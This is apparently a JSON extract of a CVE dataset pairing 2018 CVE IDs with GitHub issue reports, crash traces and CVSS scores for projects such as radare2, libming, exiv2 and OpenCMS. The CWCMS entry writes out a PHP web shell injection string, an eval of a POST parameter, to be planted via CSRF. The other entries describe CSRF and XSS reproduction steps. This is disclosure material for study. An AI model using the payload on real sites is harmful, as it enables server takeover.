NUMBERTAG f NUMBERTAG d4fefe2 in r_core_cmd_subst_i PATHTAG NUMBERTAG f NUMBERTAG d4f NUMBERTAG d in r_core_cmd_subst PATHTAG NUMBERTAG f NUMBERTAG d NUMBERTAG f NUMBERTAG in r_core_cmd PATHTAG NUMBERTAG f NUMBERTAG d NUMBERTAG d NUMBERTAG in r_core_cmd0 PATHTAG NUMBERTAG cc NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG cc NUMBERTAG bd NUMBERTAG in _start ( PATHTAG )",
  32808. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  32809. "severity": "MEDIUM",
  32810. "baseScore": 5.5,
  32811. "impactScore": 3.6,
  32812. "exploitabilityScore": 1.8
  32813. },
  32814. {
  32815. "CVE_ID": "CVE-2018-8809",
  32816. "Issue_Url_old": "https://github.com/radare/radare2/issues/9726",
  32817. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/9726",
  32818. "Repo_new": "radareorg/radare2",
  32819. "Issue_Created_At": "2018-03-19T17:46:24Z",
  32820. "description": "heap buffer overflow in dalvik_op APITAG Working environment: PATHTAG Ubuntu NUMBERTAG File format of the file you reverse: Dalvik dex Architecture/bits of the file: Arm/dex version NUMBERTAG r2 v output: radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG gd NUMBERTAG faff commit: d NUMBERTAG faff build NUMBERTAG Expected behavior: successfully analyzing dex file Actual behavior: heap buffer overflow under ASAN Steps to reproduce the behavior NUMBERTAG compile radare2 with: ASAN='address' FILETAG NUMBERTAG run: radare2 A $POC the POC is attached: FILETAG The sanitizer output and backtrace is NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b NUMBERTAG at pc NUMBERTAG f8cd NUMBERTAG c NUMBERTAG bp NUMBERTAG ffd4b4f2b NUMBERTAG sp NUMBERTAG ffd4b4f2b NUMBERTAG READ of size NUMBERTAG at NUMBERTAG b NUMBERTAG thread T NUMBERTAG f8cd NUMBERTAG c NUMBERTAG in dalvik_op PATHTAG NUMBERTAG f8cd NUMBERTAG in r_anal_op PATHTAG NUMBERTAG f8cd NUMBERTAG d NUMBERTAG in r_core_anal_search_xrefs PATHTAG NUMBERTAG f8cd NUMBERTAG dc2 in r_core_anal_refs PATHTAG NUMBERTAG f8cd NUMBERTAG in cmd_anal_all PATHTAG NUMBERTAG f8cd NUMBERTAG in cmd_anal PATHTAG NUMBERTAG f8cd NUMBERTAG d8 in r_cmd_call PATHTAG NUMBERTAG f8cd NUMBERTAG b7fe2 in r_core_cmd_subst_i PATHTAG NUMBERTAG f8cd NUMBERTAG b NUMBERTAG d in r_core_cmd_subst PATHTAG NUMBERTAG f8cd NUMBERTAG bcf NUMBERTAG in r_core_cmd PATHTAG NUMBERTAG f8cd NUMBERTAG bdd NUMBERTAG in r_core_cmd0 PATHTAG NUMBERTAG a NUMBERTAG in main PATHTAG NUMBERTAG f8cd2c NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG a NUMBERTAG dd NUMBERTAG in _start ( PATHTAG )",
  32821. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  32822. "severity": "MEDIUM",
  32823. "baseScore": 5.5,
  32824. "impactScore": 3.6,
  32825. "exploitabilityScore": 1.8
  32826. },
  32827. {
  32828. "CVE_ID": "CVE-2018-8810",
  32829. "Issue_Url_old": "https://github.com/radare/radare2/issues/9727",
  32830. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/9727",
  32831. "Repo_new": "radareorg/radare2",
  32832. "Issue_Created_At": "2018-03-19T18:03:25Z",
  32833. "description": "heap buffer overflow in get_ivar_list_t APITAG Working environment: PATHTAG Ubuntu NUMBERTAG File format of the file you reverse: Mach O Architecture/bits of the file: arm subarchitecture NUMBERTAG r2 v output: radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG gd NUMBERTAG faff commit: d NUMBERTAG faff build NUMBERTAG Expected behavior: successfully analyzing the Mach-O file Actual behavior: heap buffer overflow under ASAN (the overflowing read occurs inside strdup called from get_ivar_list_t, which suggests a name string taken from the file is not NUL-terminated within its allocation) Steps to reproduce the behavior NUMBERTAG compile radare2 with: ASAN='address' FILETAG NUMBERTAG run: radare2 qc ij $POC the POC is attached: FILETAG The sanitizer output and backtrace is NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b3d at pc NUMBERTAG f NUMBERTAG b3e5 bp NUMBERTAG ffc NUMBERTAG f NUMBERTAG c0 sp NUMBERTAG ffc NUMBERTAG f6e NUMBERTAG READ of size NUMBERTAG at NUMBERTAG b3d thread T NUMBERTAG f NUMBERTAG b3e4 in strdup ( PATHTAG NUMBERTAG f NUMBERTAG bc0e3c in get_ivar_list_t PATHTAG NUMBERTAG f NUMBERTAG bc4adf in get_class_ro_t PATHTAG NUMBERTAG f NUMBERTAG bc NUMBERTAG b in get_class_t PATHTAG NUMBERTAG f NUMBERTAG bc5b NUMBERTAG in parse_classes PATHTAG NUMBERTAG f NUMBERTAG af NUMBERTAG in r_bin_object_set_items PATHTAG NUMBERTAG f NUMBERTAG af NUMBERTAG a in r_bin_object_new PATHTAG NUMBERTAG f NUMBERTAG af1dad in r_bin_file_new_from_bytes PATHTAG NUMBERTAG f NUMBERTAG ad5d NUMBERTAG in r_bin_load_io_at_offset_as_sz PATHTAG NUMBERTAG f NUMBERTAG ad5df5 in r_bin_load_io_at_offset_as PATHTAG NUMBERTAG f NUMBERTAG ad NUMBERTAG in r_bin_load_io PATHTAG NUMBERTAG f NUMBERTAG bd3c NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG bd4f2e in r_core_bin_load PATHTAG NUMBERTAG a NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG df NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG a NUMBERTAG dd NUMBERTAG in _start ( PATHTAG )",
  32834. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  32835. "severity": "MEDIUM",
  32836. "baseScore": 5.5,
  32837. "impactScore": 3.6,
  32838. "exploitabilityScore": 1.8
  32839. },
  32840. {
  32841. "CVE_ID": "CVE-2018-8811",
  32842. "Issue_Url_old": "https://github.com/alkacon/opencms-core/issues/586",
  32843. "Issue_Url_new": "https://github.com/alkacon/opencms-core/issues/586",
  32844. "Repo_new": "alkacon/opencms-core",
  32845. "Issue_Created_At": "2018-03-20T04:50:33Z",
  32846. "description": "Cross Site Request Forgery Vulnerability in APITAG NUMBERTAG Hi Team, I would like to report multiple CSRF vulnerabilities in the latest version. mitre.org assigned a new CVE for this vulnerability. Description: Cross site request forgery (CSRF) vulnerability in PATHTAG in APITAG NUMBERTAG allows remote attackers to hijack the authentication of unspecified victims for requests that perform privilege escalation. Steps to Reproduce NUMBERTAG Send the crafted request below to a logged-in user who has Root Administrator level access. CODETAG NUMBERTAG Once the logged-in user opens the URL, the form is submitted with the root administrator's active session and the action is performed successfully. Fix: Implementing an unpredictable anti-CSRF token, bound to the session and validated server-side on every state-changing request, will mitigate the issue. Affected Version NUMBERTAG release",
  32847. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  32848. "severity": "HIGH",
  32849. "baseScore": 8.8,
  32850. "impactScore": 5.9,
  32851. "exploitabilityScore": 2.8
  32852. },
  32853. {
  32854. "CVE_ID": "CVE-2018-8813",
  32855. "Issue_Url_old": "https://github.com/wolfcms/wolfcms/issues/670",
  32856. "Issue_Url_new": "https://github.com/wolfcms/wolfcms/issues/670",
  32857. "Repo_new": "wolfcms/wolfcms",
  32858. "Issue_Created_At": "2018-03-18T12:43:32Z",
  32859. "description": "APITAG NUMBERTAG Open Redirection Vulnerability. Steps to reproduce the problem NUMBERTAG Navigate to http:// FILETAG Additional information NUMBERTAG Attacker can redirect users to malicious domains and can perform social engineering attacks. Wolf CMS version NUMBERTAG",
  32860. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  32861. "severity": "MEDIUM",
  32862. "baseScore": 4.8,
  32863. "impactScore": 2.7,
  32864. "exploitabilityScore": 1.7
  32865. },
  32866. {
  32867. "CVE_ID": "CVE-2018-8814",
  32868. "Issue_Url_old": "https://github.com/wolfcms/wolfcms/issues/671",
  32869. "Issue_Url_new": "https://github.com/wolfcms/wolfcms/issues/671",
  32870. "Repo_new": "wolfcms/wolfcms",
  32871. "Issue_Created_At": "2018-03-18T12:47:16Z",
  32872. "description": "APITAG NUMBERTAG Cross Site Request Forgery. Steps to reproduce the problem Send the request below to a logged-in user to change the plugin settings. FILETAG An attacker can also remotely uninstall any plugin by simply sending the URL below, i.e. a state-changing action that appears to be reachable with a plain GET request, so a link or image tag is enough to trigger it. URLTAG Additional information Wolf CMS version NUMBERTAG Please include narvaneni. EMAILTAG in fix release.",
  32873. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  32874. "severity": "MEDIUM",
  32875. "baseScore": 6.5,
  32876. "impactScore": 3.6,
  32877. "exploitabilityScore": 2.8
  32878. },
  32879. {
  32880. "CVE_ID": "CVE-2018-8815",
  32881. "Issue_Url_old": "https://github.com/alkacon/opencms-core/issues/587",
  32882. "Issue_Url_new": "https://github.com/alkacon/opencms-core/issues/587",
  32883. "Repo_new": "alkacon/opencms-core",
  32884. "Issue_Created_At": "2018-03-20T05:29:34Z",
  32885. "description": "Stored Cross Site Scripting via SVG image upload in Gallery Functionality. Dear Team, I would like to report a persistent XSS vulnerability in the latest release. Mitre.org assigned a CVE ID for this. Description: Cross Site Scripting (XSS) Vulnerability in Gallery functionality in APITAG NUMBERTAG allows remote attackers to execute arbitrary web script via a crafted svg image. Steps to Reproduce NUMBERTAG Login as a user who has the Gallery Editor role NUMBERTAG Navigate to the gallery and upload the svg file below. CODETAG NUMBERTAG Once another user who has Root Administrator permissions visits the image link or views the uploaded svg image, the script is executed. Fix: Validate uploaded files; because SVG is an XML document that can carry script, SVG uploads should be sanitized (script elements and event-handler attributes removed) or served so that they are not rendered inline by the browser, e.g. with a Content-Disposition attachment header. Affected Version NUMBERTAG latest release",
  32886. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N",
  32887. "severity": "MEDIUM",
  32888. "baseScore": 4.6,
  32889. "impactScore": 2.5,
  32890. "exploitabilityScore": 2.1
  32891. },
  32892. {
  32893. "CVE_ID": "CVE-2018-8832",
  32894. "Issue_Url_old": "https://github.com/enhavo/enhavo/issues/459",
  32895. "Issue_Url_new": "https://github.com/enhavo/enhavo/issues/459",
  32896. "Repo_new": "enhavo/enhavo",
  32897. "Issue_Created_At": "2018-03-13T04:49:26Z",
  32898. "description": "Admin page Stored Cross site Scripting (XSS). Summary FILETAG has a stored XSS security issue on the admin page. An authenticated attacker can inject arbitrary JavaScript, and it is executed in the browser of any authenticated victim who views the page, without any further inducement. Reproduction Here is how to reproduce this issue NUMBERTAG Access the admin page NUMBERTAG Create a Usergroup using the payload below as its value NUMBERTAG Go back to the admin user group page; a dialog appears, showing that the XSS fires. Payloads Set Usergroup as following. ERRORTAG Event NUMBERTAG uln is discovered NUMBERTAG Contact to developers NUMBERTAG No response and full disclosure",
  32899. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  32900. "severity": "MEDIUM",
  32901. "baseScore": 4.8,
  32902. "impactScore": 2.7,
  32903. "exploitabilityScore": 1.7
  32904. },
  32905. {
  32906. "CVE_ID": "CVE-2018-8899",
  32907. "Issue_Url_old": "https://github.com/IdentityServer/IdentityServer4/issues/2164",
  32908. "Issue_Url_new": "https://github.com/identityserver/identityserver4/issues/2164",
  32909. "Repo_new": "identityserver/identityserver4",
  32910. "Issue_Created_At": "2018-03-20T13:19:18Z",
  32911. "description": "Encode redirect uri on authorization response.",
  32912. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  32913. "severity": "MEDIUM",
  32914. "baseScore": 6.1,
  32915. "impactScore": 2.7,
  32916. "exploitabilityScore": 2.8
  32917. },
  32918. {
  32919. "CVE_ID": "CVE-2018-8960",
  32920. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1020",
  32921. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1020",
  32922. "Repo_new": "imagemagick/imagemagick",
  32923. "Issue_Created_At": "2018-03-13T08:25:23Z",
  32924. "description": "heap buffer overflow. PATHTAG convert version Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib djvu fftw fontconfig fpx freetype jbig jng jpeg lcms lqr lzma openexr pangocairo png tiff webp wmf x xml zlib PATHTAG convert tif_heap buffer overflow dev/null APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG c NUMBERTAG c NUMBERTAG c at pc NUMBERTAG f NUMBERTAG a3bc NUMBERTAG bp NUMBERTAG ffc3e5db NUMBERTAG sp NUMBERTAG ffc3e5db NUMBERTAG READ of size NUMBERTAG at NUMBERTAG c NUMBERTAG c NUMBERTAG c thread T NUMBERTAG f NUMBERTAG a3bc NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG e0 in APITAG APITAG NUMBERTAG f NUMBERTAG a in APITAG APITAG NUMBERTAG f NUMBERTAG e3e NUMBERTAG f in APITAG APITAG NUMBERTAG f NUMBERTAG d in APITAG APITAG NUMBERTAG d9 in APITAG APITAG NUMBERTAG f NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG NUMBERTAG c NUMBERTAG c NUMBERTAG c is located NUMBERTAG bytes inside of NUMBERTAG byte region FILETAG",
  32925. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  32926. "severity": "HIGH",
  32927. "baseScore": 8.8,
  32928. "impactScore": 5.9,
  32929. "exploitabilityScore": 2.8
  32930. },
  32931. {
  32932. "CVE_ID": "CVE-2018-8961",
  32933. "Issue_Url_old": "https://github.com/libming/libming/issues/130",
  32934. "Issue_Url_new": "https://github.com/libming/libming/issues/130",
  32935. "Repo_new": "libming/libming",
  32936. "Issue_Created_At": "2018-03-22T03:27:43Z",
  32937. "description": "multiple heap use after frees in decompile.c. In latest version NUMBERTAG and commit of libming, there are multiple heap use after frees in PATHTAG functions of decompile.c, which could be triggered by the POCs below. To reproduce the issue, compile with ASAN and run: ./swftophp $POC ./swftophp libming NUMBERTAG swftophp_heap use after APITAG APITAG NUMBERTAG ERROR: APITAG heap use after free on address NUMBERTAG at pc NUMBERTAG fef9 bp NUMBERTAG ffc4b NUMBERTAG a NUMBERTAG sp NUMBERTAG ffc4b NUMBERTAG a NUMBERTAG READ of size NUMBERTAG at NUMBERTAG thread T NUMBERTAG fef8 in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG af NUMBERTAG in APITAG PATHTAG NUMBERTAG af NUMBERTAG in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG b NUMBERTAG in APITAG PATHTAG NUMBERTAG b NUMBERTAG in main PATHTAG NUMBERTAG efe9f3e0c NUMBERTAG in __libc_start_main APITAG NUMBERTAG ERRORTAG NUMBERTAG d3 ( PATHTAG ERRORTAG NUMBERTAG d3) ./swftophp libming NUMBERTAG swftophp_heap use after APITAG NUMBERTAG ERROR: APITAG heap use after free on address NUMBERTAG at pc NUMBERTAG eed4 bp NUMBERTAG ffd4a NUMBERTAG ba NUMBERTAG sp NUMBERTAG ffd4a NUMBERTAG ba NUMBERTAG READ of size NUMBERTAG at NUMBERTAG thread T NUMBERTAG eed3 in APITAG PATHTAG NUMBERTAG c in APITAG PATHTAG NUMBERTAG c in APITAG PATHTAG NUMBERTAG af NUMBERTAG in APITAG PATHTAG NUMBERTAG af NUMBERTAG in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG b NUMBERTAG in APITAG PATHTAG NUMBERTAG b NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG e NUMBERTAG b9c NUMBERTAG in __libc_start_main APITAG NUMBERTAG ERRORTAG NUMBERTAG d3 ( PATHTAG ERRORTAG NUMBERTAG d3) ./swftophp FILETAG libming NUMBERTAG swftophp_heap use after APITAG APITAG NUMBERTAG ERROR: APITAG heap use after free on address NUMBERTAG a0 at pc NUMBERTAG fef9 bp NUMBERTAG ffd NUMBERTAG d NUMBERTAG db0 sp NUMBERTAG ffd NUMBERTAG d NUMBERTAG da8 READ of 
size NUMBERTAG at NUMBERTAG a0 thread T NUMBERTAG fef8 in APITAG PATHTAG NUMBERTAG bd NUMBERTAG in APITAG PATHTAG NUMBERTAG bd NUMBERTAG in APITAG PATHTAG NUMBERTAG af NUMBERTAG in APITAG PATHTAG NUMBERTAG af NUMBERTAG in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG b NUMBERTAG in APITAG PATHTAG NUMBERTAG b NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG a5ac NUMBERTAG in __libc_start_main APITAG NUMBERTAG ERRORTAG NUMBERTAG d3 ( PATHTAG ERRORTAG NUMBERTAG d3)",
  32938. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  32939. "severity": "MEDIUM",
  32940. "baseScore": 6.5,
  32941. "impactScore": 3.6,
  32942. "exploitabilityScore": 2.8
  32943. },
  32944. {
  32945. "CVE_ID": "CVE-2018-8972",
  32946. "Issue_Url_old": "https://github.com/CREDITWEST/CWCMS/issues/1",
  32947. "Issue_Url_new": "https://github.com/creditwest/cwcms/issues/1",
  32948. "Repo_new": "creditwest/cwcms",
  32949. "Issue_Created_At": "2018-03-24T13:28:18Z",
  32950. "description": "Cwcms backend CSRF leading to a web shell (getshell). In APITAG PHP NUMBERTAG a user of the backend (admin) panel can write the string \";eval($_POST['x']);// into the site configuration, which yields a web shell (presumably because the configuration is persisted as PHP code and later executed); combined with the CSRF vulnerability in the website configuration form, an attacker can obtain the shell by having a logged-in backend user submit the crafted request.",
  32951. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  32952. "severity": "HIGH",
  32953. "baseScore": 8.8,
  32954. "impactScore": 5.9,
  32955. "exploitabilityScore": 2.8
  32956. },
  32957. {
  32958. "CVE_ID": "CVE-2018-8976",
  32959. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/246",
  32960. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/246",
  32961. "Repo_new": "exiv2/exiv2",
  32962. "Issue_Created_At": "2018-03-23T09:37:18Z",
  32963. "description": "a bug in APITAG a bug results in a segmentation fault in APITAG, and the reporter suggests it may be a format-string vulnerability which could be exploited. Note: in the trace below the format string passed to vsnprintf appears to be a fixed literal, and the fault is at a repnz scas (strlen) on the pointer supplied for a %s argument, which points to an invalid argument pointer rather than attacker-controlled format directives; treat the format-string claim as unconfirmed until the source of that argument is checked. the debug info as follows: Breakpoint NUMBERTAG APITAG (format NUMBERTAG ffff NUMBERTAG a NUMBERTAG ld NUMBERTAG ff NUMBERTAG s\") at APITAG NUMBERTAG rc = vsnprintf(&buffer NUMBERTAG APITAG format, args); gdb peda$ n Program received signal SIGSEGV, Segmentation fault. [ registers ] RA NUMBERTAG RB NUMBERTAG fffffffd NUMBERTAG ffffbad NUMBERTAG RC NUMBERTAG ffffffffffffffff RD NUMBERTAG RSI NUMBERTAG fffffe8 RDI NUMBERTAG RBP NUMBERTAG fffffffd NUMBERTAG b NUMBERTAG fffffff\") RSP NUMBERTAG fffffffcf NUMBERTAG RIP NUMBERTAG ffff6d NUMBERTAG APITAG repnz scas al,BYTE PTR es:[rdi]) R NUMBERTAG fffffff R NUMBERTAG ffff7fe NUMBERTAG ffff7fe NUMBERTAG R NUMBERTAG ffff NUMBERTAG bfe NUMBERTAG R NUMBERTAG R NUMBERTAG ffff6d NUMBERTAG f NUMBERTAG APITAG cmp BYTE PTR [rbp NUMBERTAG R NUMBERTAG R NUMBERTAG ffff NUMBERTAG a NUMBERTAG ld NUMBERTAG ff NUMBERTAG s\") R NUMBERTAG fffffffd6e NUMBERTAG EFLAGS NUMBERTAG carry PARITY adjust zero SIGN trap INTERRUPT direction overflow) [ code NUMBERTAG ffff6d NUMBERTAG a APITAG : xor eax,ea NUMBERTAG ffff6d NUMBERTAG c APITAG : or rc NUMBERTAG ffffffffffffffff NUMBERTAG ffff6d NUMBERTAG APITAG : mov rdi,r NUMBERTAG ffff6d NUMBERTAG APITAG : repnz scas al,BYTE PTR es:[rdi NUMBERTAG ffff6d NUMBERTAG APITAG : mov DWORD PTR [rbp NUMBERTAG ffff6d NUMBERTAG f APITAG : mov rsi,rc NUMBERTAG ffff6d NUMBERTAG APITAG : not rsi NUMBERTAG ffff6d NUMBERTAG APITAG : lea r NUMBERTAG rsi NUMBERTAG stack NUMBERTAG fffffffcf NUMBERTAG fffffffcf NUMBERTAG fffffffcf NUMBERTAG fffffffcf NUMBERTAG fffffffcf NUMBERTAG fffffffcf NUMBERTAG fffffffcf NUMBERTAG fffffffd0b NUMBERTAG ffffffffffffffff NUMBERTAG fffffffcf NUMBERTAG Legend: code, data, rodata, value Stopped reason: SIGSEG NUMBERTAG ffff6d NUMBERTAG in _IO_vfprintf_internal (s=s APITAG format=<optimized out>, format APITAG NUMBERTAG ld NUMBERTAG ff 
NUMBERTAG s\", ap=ap APITAG at APITAG NUMBERTAG fprintf.c: No such file or directory. gdb peda$ bt NUMBERTAG ffff6d NUMBERTAG in _IO_vfprintf_internal (s=s APITAG format=<optimized out>, format APITAG NUMBERTAG ld NUMBERTAG ff NUMBERTAG s\", ap=ap APITAG at APITAG NUMBERTAG ffff6d2d NUMBERTAG in _IO_vsnprintf (string NUMBERTAG b NUMBERTAG fffffff\", maxlen=<optimized out>, format NUMBERTAG ffff NUMBERTAG a NUMBERTAG ld NUMBERTAG ff NUMBERTAG s\", args NUMBERTAG fffffffd6e0) at APITAG NUMBERTAG ffff NUMBERTAG d in APITAG (format NUMBERTAG ffff NUMBERTAG a NUMBERTAG ld NUMBERTAG ff NUMBERTAG s\") at APITAG NUMBERTAG ffff NUMBERTAG e9 in APITAG (this NUMBERTAG a NUMBERTAG out=..., APITAG depth NUMBERTAG at APITAG NUMBERTAG cafe in APITAG (this NUMBERTAG e0, out=..., APITAG at APITAG NUMBERTAG c NUMBERTAG b in APITAG (this NUMBERTAG e0, PATHTAG ) at APITAG NUMBERTAG e NUMBERTAG in main (argc NUMBERTAG arg NUMBERTAG fffffffe4b8) at APITAG NUMBERTAG ffff6cdcf NUMBERTAG in __libc_start_main (main NUMBERTAG e NUMBERTAG e <main(int, char const )>, argc NUMBERTAG arg NUMBERTAG fffffffe4b8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end NUMBERTAG fffffffe4a8) at libc APITAG NUMBERTAG dfb9 in _start () APITAG the bug trigger commandline is : PATHTAG pS $POC please ref the following url for the poc: FILETAG",
  32964. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  32965. "severity": "MEDIUM",
  32966. "baseScore": 6.5,
  32967. "impactScore": 3.6,
  32968. "exploitabilityScore": 2.8
  32969. },
  32970. {
  32971. "CVE_ID": "CVE-2018-8977",
  32972. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/247",
  32973. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/247",
  32974. "Repo_new": "exiv2/exiv2",
  32975. "Issue_Created_At": "2018-03-23T09:57:44Z",
  32976. "description": "Invalid memory access in APITAG An Invalid memory access in APITAG in APITAG the debug info as follows : s ] RA NUMBERTAG b8 RB NUMBERTAG RC NUMBERTAG fffffffdb NUMBERTAG ERRORTAG NUMBERTAG d NUMBERTAG f ('/P') RD NUMBERTAG ad NUMBERTAG RSI NUMBERTAG fffffffdbdf NUMBERTAG RDI NUMBERTAG ad NUMBERTAG RBP NUMBERTAG fffffffdd NUMBERTAG fffffffde NUMBERTAG fffffffde NUMBERTAG fffffffe NUMBERTAG fffffffe NUMBERTAG fffffffe NUMBERTAG RSP NUMBERTAG fffffffdc NUMBERTAG RIP NUMBERTAG ffff NUMBERTAG bf APITAG APITAG const&, APITAG const NUMBERTAG mov rax,QWORD PTR [rax]) R NUMBERTAG R NUMBERTAG R NUMBERTAG fffffffda NUMBERTAG R NUMBERTAG cf1c APITAG APITAG const>: push rbp) R NUMBERTAG R NUMBERTAG R NUMBERTAG R NUMBERTAG EFLAGS NUMBERTAG carry PARITY adjust zero sign trap INTERRUPT direction overflow) [ code NUMBERTAG ffff NUMBERTAG b3 APITAG APITAG const&, APITAG const NUMBERTAG mov rdx,ra NUMBERTAG ffff NUMBERTAG b6 APITAG APITAG const&, APITAG const NUMBERTAG mov rax,QWORD PTR [rd NUMBERTAG ffff NUMBERTAG b9 APITAG APITAG const&, APITAG const NUMBERTAG add ra NUMBERTAG b NUMBERTAG ffff NUMBERTAG bf APITAG APITAG const&, APITAG const NUMBERTAG mov rax,QWORD PTR [ra NUMBERTAG ffff NUMBERTAG c2 APITAG APITAG const&, APITAG const NUMBERTAG mov rdi,rd NUMBERTAG ffff NUMBERTAG c5 APITAG APITAG const&, APITAG const NUMBERTAG call ra NUMBERTAG ffff NUMBERTAG c7 APITAG APITAG const&, APITAG const NUMBERTAG mov rdx,ra NUMBERTAG ffff NUMBERTAG ca APITAG APITAG const&, APITAG const NUMBERTAG lea rax,[rbp NUMBERTAG d0] [ stack NUMBERTAG fffffffdc NUMBERTAG fffffffdc NUMBERTAG f NUMBERTAG b4f NUMBERTAG fffffffdc NUMBERTAG fffffffdc NUMBERTAG ac NUMBERTAG a NUMBERTAG f NUMBERTAG d9c NUMBERTAG da NUMBERTAG fffffffdc NUMBERTAG ffff7b NUMBERTAG d NUMBERTAG ffff NUMBERTAG APITAG APITAG push rbp NUMBERTAG fffffffdc NUMBERTAG fffffffde NUMBERTAG ffff NUMBERTAG b NUMBERTAG ffff NUMBERTAG a0 APITAG push rb NUMBERTAG fffffffdc NUMBERTAG ffff7b NUMBERTAG c NUMBERTAG 
fffffffdc NUMBERTAG ffff7b NUMBERTAG a NUMBERTAG Legend: code, data, rodata, value Stopped reason: SIGSEG NUMBERTAG ffff NUMBERTAG bf in APITAG (os=..., value=..., metadata NUMBERTAG ac0) at APITAG NUMBERTAG if( metadata APITAG )) APITAG == APITAG EOS NUMBERTAG D\" gdb peda$ bt NUMBERTAG ffff NUMBERTAG bf in APITAG (os=..., value=..., metadata NUMBERTAG ac0) at APITAG NUMBERTAG ffff NUMBERTAG e NUMBERTAG in APITAG (os=..., value=..., metadata NUMBERTAG ac0) at APITAG NUMBERTAG ffff NUMBERTAG ce NUMBERTAG in APITAG (this NUMBERTAG os=..., APITAG at APITAG NUMBERTAG ffff NUMBERTAG f9ba in APITAG (this NUMBERTAG APITAG at APITAG NUMBERTAG in APITAG (this NUMBERTAG md=..., APITAG at APITAG NUMBERTAG fda6 in APITAG (this NUMBERTAG image NUMBERTAG ab0) at APITAG NUMBERTAG fcd4 in APITAG (this NUMBERTAG at APITAG NUMBERTAG c NUMBERTAG b in APITAG (this NUMBERTAG PATHTAG ) at APITAG NUMBERTAG e NUMBERTAG in main (argc NUMBERTAG arg NUMBERTAG fffffffe NUMBERTAG at APITAG NUMBERTAG ffff6cdcf NUMBERTAG in __libc_start_main (main NUMBERTAG e NUMBERTAG e <main(int, char const )>, argc NUMBERTAG arg NUMBERTAG fffffffe NUMBERTAG init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end NUMBERTAG fffffffe NUMBERTAG at libc APITAG NUMBERTAG dfb9 in _start () ============ the bug trigger commandline is : PATHTAG pt $POC please ref the following url for the poc: URLTAG",
  32977. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  32978. "severity": "MEDIUM",
  32979. "baseScore": 6.5,
  32980. "impactScore": 3.6,
  32981. "exploitabilityScore": 2.8
  32982. },
  32983. {
  32984. "CVE_ID": "CVE-2018-9009",
  32985. "Issue_Url_old": "https://github.com/libming/libming/issues/131",
  32986. "Issue_Url_new": "https://github.com/libming/libming/issues/131",
  32987. "Repo_new": "libming/libming",
  32988. "Issue_Created_At": "2018-03-25T01:21:59Z",
  32989. "description": "heap use after free in APITAG (decompile.c). In latest version of libming NUMBERTAG there is a heap use after free in APITAG function of decompile.c file, which could be triggered by the POC below. The \"FREE\" operation corresponds to a \"realloc\" in APITAG (realloc may move the actions array, so any earlier pointer into the old allocation is left dangling) APITAG NUMBERTAG APITAG NUMBERTAG APITAG (FILE f, int length NUMBERTAG while ( APITAG < end NUMBERTAG APITAG (f, &(parserrec APITAG parserrec APITAG NUMBERTAG parserrec APITAG = (SWF_ACTION ) realloc (parserrec APITAG NUMBERTAG The freed heap is used in APITAG function APITAG NUMBERTAG static int NUMBERTAG APITAG n, SWF_ACTION actions, int maxn NUMBERTAG if (sactif > Actions FILETAG",
  32990. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  32991. "severity": "HIGH",
  32992. "baseScore": 8.8,
  32993. "impactScore": 5.9,
  32994. "exploitabilityScore": 2.8
